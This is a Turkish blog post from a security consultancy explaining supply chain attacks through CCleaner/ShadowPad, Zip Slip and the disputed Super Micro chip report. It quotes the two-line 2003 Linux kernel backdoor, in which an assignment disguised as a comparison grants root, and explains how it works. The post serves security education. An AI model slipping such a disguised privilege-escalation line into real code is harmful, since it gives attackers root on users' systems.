Supply Chain Saldırıları

Supply Chain Nedir?

Supply chain ya da türkçesi ile tedarik zinciri Vikipedi’nin tanımına göre ürün(ler) ya da hizmet(ler)in tedarikçiden müşteriye doğru hareket(ler)ini kapsayan ve bu süreç içerisindeki örgütler, insanlar, teknoloji, faaliyetler, ve kaynaklar sistemlerinin bütününe verilen isimdir.

Supply chain saldırıları ise bu tedarik zincirinin en zayıf halkasını bularak exploit etmeye yönelik, başarılı olması durumunda oldukça tehlikeli olan saldırlardır. Bu saldırıların başarılı olmasındaki en önemli sebep ise tedarik zincirlerinin tamamının kontrol edilememesidir.

Siber saldırılarda saldırganlar genellikle elektrik gibi direncin en az olduğu noktaya giderler. Yani saldırgan sizin sisteminize sızmak için uğraşmak yerine kullandığınız teknolojileri bilmesi durumunda kullandığınız uygulamaya sızarak hem sizin sisteminizi ele geçirip hem de yanında bonus olarak uygulamanın binlerce hatta milyonlarca kullanıcısına da erişim sağlayabilir.

Son zamanlarda şirketlerin iç güvenliklerini arttırması ile birlikte hedef daha zayıf bir halka olan şirketler tarafından kullanılmakta olan uygulamalara kaymış durumda. Örneğin 2017 yılında Ccleaner’a yapılan saldırıda ilk aşamada 2 milyon kullanıcıya içinde zararlı kod bulunan güncelleştirmenin yüklettirildiği biliniyor. Ancak bu 2 milyon kullanıcıdan sadece 40’ına saldırının ikinci aşaması olan ShadowPad arkakapısı yüklettirilmiş. Bu 40 cihazın bulunduğu domainlere bakıldığında ise saldırganların hedeflerinin Google, Microsoft, Cisco, Intel, Samsung, Sony, HTC, Linksys, D-Link, Akamai, VMware firmaları olduğu ortaya çıkıyor.

Her ne kadar açık kaynak kodlu projeler uygun önlemler alındığında daha güvenli olsalar da onlar da supply chain saldırılarından tam olarak korunaklı değil. 2018 Nisan ayında fark edilen Zip Slip isimli güvenlik açığı sayesinde saldırganlar hedefin sıkıştırılmış dosyayı açması durumunda sistem dosyalarını değiştirerek istedikleri kodu çalıştırabilmekteler. Güvenlik açığının oluşmasındaki sebep ise sıkıştırma fonksiyonunda uygun kontroller olmayan bir fonksiyonun birçok yerde kullanılması. Güvenlik açığının istenerek mi yoksa istenmeden mi eklendiği bilinmiyor ancak bu tür güvenlik açıklarının kod sahibi tarafından fark edilmeden kodlara eklenmesi eğer özellikle kodlar kontrol edilmiyorsa çok zor bir problem değil. Örneğin 2003 yılında kimliği bilinmeyen kişi ya da kişiler Linux çekirdeğinin bulunduğu sunucuya sızarak sadece aşağıdaki iki satırlık kodu eklemiş.

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;

Bu iki satır her ne kadar masum görünse de eğer saldırganlar kodun linux çekirdeğinde fark edilmeden kalmasında başarılı olsalardı istedikleri hedef üzerinde uygun bayrakları çağırarak kendilerini root yetkisine yükseltebileceklerdi. Normalde current->uid == 0 kontrolü ile bayrakları çağıranın root yetkisine sahip olduğunun kontrol edilmesi gerekirken current->uid = 0 dendiğinde bayrakları çağıranın uid’si 0 yani root yapılmaktadır. Saldırganların fark edilmelerinin sebebinin ise değişikliliği linux çekirdeğinin BitKeeper üzerinde bulunan ana kodlar yerine CVS üzerinde bulunan, BitKeeper sevmeyenlerin kullandığı sunucuya eklemeleri, kodun neden eklendiğine dair sebep yazmamaları gösterilebilir.

Donanım tarafında ise Bloomberg’in 4 Ekim 2018 tarihinde yayınladığı habere göre Çin Halk Cumhuriyeti’nin askeri birimlerinden biri 2015 yılında Super Micro firmasının ürettiği anakartlara cihazların uzaktan bağlantı almasını sağlayacak oldukça küçük bir çip ekledi. Yine aynı habere göre bu anakartı alan firmalar arasında Amazon, Apple, adı açıklanmayan büyük bir banka ve 30 farklı şirket var. Her ne kadar Amazon ve Super Micro haberin asılsız olduğunu savunsalar da Bloomberg yayınladığı haberin arkasında duruyor. Ancak Super Micro firmasının hisse senetlerinin fiyatının %40 düşmesi piyasaların Super Micro’nun açıklamalarına inanmadıklarını gösterir nitelikte.

supplychain

Super Micro firmasının haber yayınlandıktan sonraki hisse değerleri

Bu tür saldırılar Ken Thompson’un 1984 yılında yazmış olduğu “Reflections on Trusting Trust” isimli yazısında da anlattığı üzere sistemler kompleksleştikçe bulunması oldukça zorlaşmakta. Otomatize sistemler ile kod kontrolü yaygınlaşsa da iyi yerleştirilmiş bir arkakapının bulunması yıllar alabilmekte.

Gelecekte firmaların iç güvenliklerini iyileştirmeleri ile birlikte supply chain saldırılarının artması bekleniyor.

 

Peki Bu Saldırıları Önlemek İçin Ne Yapmak Gerekiyor?

  • Dışarıya olan tüm bağlantılarınızı kayıt ve kontrol edin.
  • Saldırı yüzeyinizi minimum seviyeye düşürün.
  • Kullandığınız yazılım ve donanımları test edin.

Blog postu ile ilgili bir sorunuz varsa bizimle iletişime geçebilirsiniz.

Onur ERHAN

Size nasıl yardımcı olalım?

İhtiyacınız olan her an Prisma danışmanları yanı başınızda. Bizimle 7/24 iletişime geçebilirsiniz.


    Sızma testi hizmetlerimizi incelediniz mi?